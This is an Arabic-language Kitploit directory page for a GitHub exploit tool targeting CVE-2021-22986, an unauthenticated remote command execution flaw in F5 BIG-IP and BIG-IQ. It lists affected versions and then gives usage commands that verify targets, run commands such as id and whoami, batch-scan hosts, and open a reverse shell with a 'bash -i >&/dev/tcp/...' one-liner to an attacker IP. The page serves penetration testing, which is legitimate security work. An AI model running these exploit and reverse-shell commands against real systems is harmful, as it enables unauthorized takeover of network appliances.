Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-22986 — CVE-2021-22986 و F5 BIG-IP RCE | Kitploit
أدوات/GitHubGitHub/al1ex/cve-2021-22986
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubal1ex/cve-2021-22986

CVE-2021-22986

CVE-2021-22986 و F5 BIG-IP RCE

عرض المستودع
9129منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تأثير الثغرة

تسمح هذه الثغرة للمهاجمين غير الموثوقين الذين لديهم وصول شبكي إلى واجهة iControl REST، عبر واجهة إدارة BIG-IP وعناوين IP الذاتية، بتنفيذ أوامر نظام تعسفية، وإنشاء أو حذف الملفات، وتعطيل الخدمات. يمكن استغلال هذه الثغرة فقط من خلال مستوى التحكم ولا يمكن استغلالها من خلال مستوى البيانات. يمكن أن يؤدي الاستغلال إلى اختراق النظام بالكامل. نظام BIG-IP في وضع الجهاز (Appliance mode) معرض أيضًا للخطر.

المنتج المتأثر

  • F5 BIG-IQ 6.0.0-6.1.0
  • F5 BIG-IQ 7.0.0-7.0.0.1
  • F5 BIG-IQ 7.1.0-7.1.0.2
  • F5 BIG-IP 12.1.0-12.1.5.2
  • F5 BIG-IP 13.1.0-13.1.3.5
  • F5 BIG-IP 14.1.0-14.1.3.1
  • F5 BIG-IP 15.1.0-15.1.2
  • F5 BIG-IP 16.0.0-16.0.1

فحص الثغرة

الاستخدام الأساسي

root@kitploit:~
python3 CVE_2021_22986.py

use

التحقق من الثغرة

root@kitploit:~
python3 CVE_2021_22986.py -v true -u https://192.168.174.164

verify

تنفيذ الأمر:

root@kitploit:~
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id

command_exec

root@kitploit:~
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami

exec_2

المسح الدفعي

root@kitploit:~
python3 CVE_2021_22986.py -s true -f check.txt

batch_scan

الصدفة العكسية

root@kitploit:~
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"

reverse_shell

reverse_shell_ok

إثبات المفهوم الجديد

root@kitploit:~
python3 newpoc.py https://192.168.174.164

newpoc

المراجع

https://support.f5.com/csp/article/K03009991

https://github.com/safesword/F5_RCE

https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986

https://github.com/Udyz/CVE-2021-22986-SSRF2RCE

تنزيل الأداة